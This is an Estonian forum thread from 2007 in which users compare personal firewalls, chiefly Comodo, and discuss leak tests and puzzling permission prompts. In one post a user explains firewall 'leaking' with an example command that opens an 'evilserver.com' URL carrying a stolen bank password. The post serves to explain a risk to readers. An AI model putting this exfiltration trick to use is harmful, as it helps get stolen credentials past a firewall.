Hinnavaatlus
:: Foorum
:: Uudised
:: Ärifoorumid
:: HV F1 ennustusvõistlus
:: Pangalink
:: Telekavad
:: HV toote otsing
|
|
autor |
|
Märt.
HV Guru

|
02.06.2007 22:53:37
|
|
|
Eks ma homme vaatan, poiss juba magab, aga peaks olema ajakohane.
_________________ Albert Einstein: "Vaid kaks asja on lõpmatud, universum ja inimlik rumalus, ja selles esimeses pole ma nii kindel." |
|
Kommentaarid: 29 loe/lisa |
Kasutajad arvavad: |
   |
:: |
0 :: |
23 |
|
tagasi üles |
|
 |
HacaX
HV Guru

|
03.06.2007 00:11:50
|
|
|
IMO siiski päris paranoiliseks ei tasu kah minna. Turvalisus põhineb niikuinii usaldusel - et antiviirus tõesti otsib viiruseid mitte ei näita lihtsalt ajaviiteks neid ulmelisi numbreid, et tulemüür ei sisalda backdoor'i, jne. Ainus loogiline samm oleks vaid iseennast usaldada ning kõik kaitsevahendid ise kirjutada, aga ega's seegi ideaalne lahendus ole - pole mingit garantiid et kogemata mingit auku pole sisse unustanud või et opsüsteem ise mingit säärast lutikat ei sisalda mille vahendusel kaitsest igasuguse probleemita mööda...
Milleni ma üritan välja jõuda: testid, eriti leaktestide omad, ei ole midagi mida aboluutse alusena võtta. Oma peamist funktsiooni - peatada väljastpoolt tulevaid ühendusi - täidavad kõik müürid edukalt. Väljamineva liiklusega tulevad enamus samuti mingil määral toime. Seega peaksin isiklikult keskmise kodukasutaja seisukohast vaadates määravaimaks just müüri kasutajaliidese väljanägemist ning mugavust, seda kui hästi need mingi konkreetse tarbija harjumuste/maitsega kokku sobivad. Ja kui kukubki müür mõnest testist läbi, kah asi! Vähemalt on tõenäosus, et kasutaja ei hoia planku poole ajast unloadituna kuna see häirib tema tegemisi ning teise poole vaid osalise kontrollimisega töös, märgatavalt väiksem kui müüri puhul mis tehniliselt võib parem olla aga mida kasutaja tegelikult ei seedi.
_________________ IMO & GPLed |
|
Kommentaarid: 24 loe/lisa |
   |
1 :: |
22 |
|
tagasi üles |
|
 |
angel
HV Guru

|
03.06.2007 00:23:55
|
|
|
ma lihtsalt loodan et kui mingi programm juba teatud aja eksisteerib siis mingid tondid ikka leiavad midagi ebameeldivat ülesse selle juures kui seda on... kuida muidu siis see ZA vahele jäi oma värgiga (ise suht vihkan seda ZA juba, sai korra trial värki proovitud ja värdjas keeras kõik piixu )
_________________ |--{o,o}-----(\__/)-----------------|
|--|)__)-----(='.'=) ----O RLY ?---|
|---"-"- -----(")_(")-----------------| |
|
Kommentaarid: 175 loe/lisa |
   |
157 |
|
tagasi üles |
|
 |
mikk36
HV Guru

|
03.06.2007 02:19:34
|
|
|
Lord Ami kirjutas: |
Endal praegu KIS.
Comodol oli kuskil, et definite new trusted application.Pane sinna utorrent.Kuskil oli seal toolsides vms. |
ma ju rõhutasin et miski ei aidanud, isegi allow all asendis tegi ta oma pulli edasi
|
|
Kommentaarid: 85 loe/lisa |
   |
2 :: |
78 |
|
tagasi üles |
|
 |
angel
HV Guru

|
03.06.2007 02:46:44
|
|
|
endal igatahes seni kõik toimib...
to mikk36: mis tulemüüri siis kasutad kui comodo'ga läbi ei saa?
_________________ |--{o,o}-----(\__/)-----------------|
|--|)__)-----(='.'=) ----O RLY ?---|
|---"-"- -----(")_(")-----------------| |
|
Kommentaarid: 175 loe/lisa |
   |
157 |
|
tagasi üles |
|
 |
mikk36
HV Guru

|
03.06.2007 21:58:16
|
|
|
hetkel ei miskit, pole probleemi
|
|
Kommentaarid: 85 loe/lisa |
   |
2 :: |
78 |
|
tagasi üles |
|
 |
ykshuntka
HV kasutaja

|
14.06.2007 12:16:55
|
|
|
Olen kasutanud sügisest saati Comodo tulemüüri 900mh Celeronil.
Küsib minule arusaamatuid küsimusi! Nt *.dll kasutamine Firefoxis
Kui keelata, siis Firefox ei pääse netti. Milleks küsida, kui ma ei sa EI vastata?
Programmide kasutamisel või peale kasutamist Firefoxi käivitamisel viskab seda küsimust.Nt OpenOffice mingi dll
Kas Firefox on tõesti muudetav teiste programmide poolt?
Viimane Comodo tulemüüri küsimus, millele minul puudub seisukoht:
RocketDock.exe on XP to Vista välimuse oma. Aga kas tõesti läheb läbi FireFoxi netti?
Kui minul puuduks tulemüür, siis need läheksid netti?
Hetkel ma saan teada tänu Comodole, et võivad minna netti, aga midagi teha ka ei saa?
|
|
Kommentaarid: 53 loe/lisa |
   |
47 |
|
tagasi üles |
|
 |
HacaX
HV Guru

|
14.06.2007 16:00:55
|
|
|
RocketDock käivitas FFi, kogu moos. Ega selleks, et inffi välja saata, ei pea ise võrku minema. Piisab näiteks lihtsast "RUN http://evilserver.com/stolenpasswords?=SEE+ON+PAROOL+MILLE+MA+HANSAPANGA+LEHEL+KINNI+PUUDSIN" reast et su brauserit andmete väljaviimiseks ära kasutada (Win käivitab sellise rea peale süsteemis vaikimisi registreeritud brauseri, ning nüüd pruugib Evilserver.com jooksutaja vaid silma peal hoida oma masinas jooksval "stolenpasswords" skripti väljundil). Just seda nimetataksegi lekkimiseks, s.t. pahalane ei roni ise netti (mille peale *iga* väljaminevat liiklust kontrolliv müür ta kinni peaks) vaid kasutab selleks teisi programme (millel võrguõigused olemas). Säärase asja vastu *peabki* üks õige tulemüür kaitsma.
Mida saad küsimise vähendamiseks teha on paika panna kes võivad brausereid/FTP kliente/jms käivitada (shell (reeglina Explorer.exe, aga ka alternatiivsed aknahaldurid a'la AstonShell ja LiteStep) on peamine mis seda teeb, failihaldurid (Total Commander) kah kui nende vahendusel programme tööle lased) ja ennast harjutama linke jms. mitte klõpsima progedes kellel muidu võrku asja ei ole (näiteks paljud programmid sisaldavad oma Help=>About kastis koduka aadressi - sellel klõpsimine on opsüsteemi seisukohast sama nagu oleks programm ise brauseri tööle lasknud).
_________________ IMO & GPLed |
|
Kommentaarid: 24 loe/lisa |
   |
1 :: |
22 |
|
tagasi üles |
|
 |
Silver112
HV kasutaja

|
12.07.2007 19:54:00
|
|
|
ykshuntka kirjutas: |
Olen kasutanud sügisest saati Comodo tulemüüri 900mh Celeronil.
Küsib minule arusaamatuid küsimusi! Nt *.dll kasutamine Firefoxis
Kui keelata, siis Firefox ei pääse netti. Milleks küsida, kui ma ei sa EI vastata? |
Võta Comodo lahti, --> Security --> Scan for known applications.
Siis tee resa ja kõik peaks Ok olema...
|
|
Kommentaarid: 2 loe/lisa |
   |
1 |
|
tagasi üles |
|
 |
ykshuntka
HV kasutaja

|
12.07.2007 21:07:44
|
|
|
Silver112 kirjutas: |
Võta Comodo lahti, --> Security --> Scan for known applications.
Siis tee resa ja kõik peaks Ok olema... |
See pole lahendus. Safelist e. whitelist on minu arvates üks lollimaid reegleid.
Küsimuse vastus tõlgendatakse comodo poolt valesti.
Lahendus oleks vahest selline: kui panen, et ei luba, siis pääsen ikka firefox netti.
Aga see jura, mis tahtis minna läbi firefox ei pääse.
to HacaX
Kuidas keelate/lubada, kes võivad brausereid/FTP kliente/jms käivitada.
Ja käivitajaks olen ikka mina. Comodo kisab, et läbi firefox võib minna.
Iseenesliku käivitust ei toimu.
|
|
Kommentaarid: 53 loe/lisa |
   |
47 |
|
tagasi üles |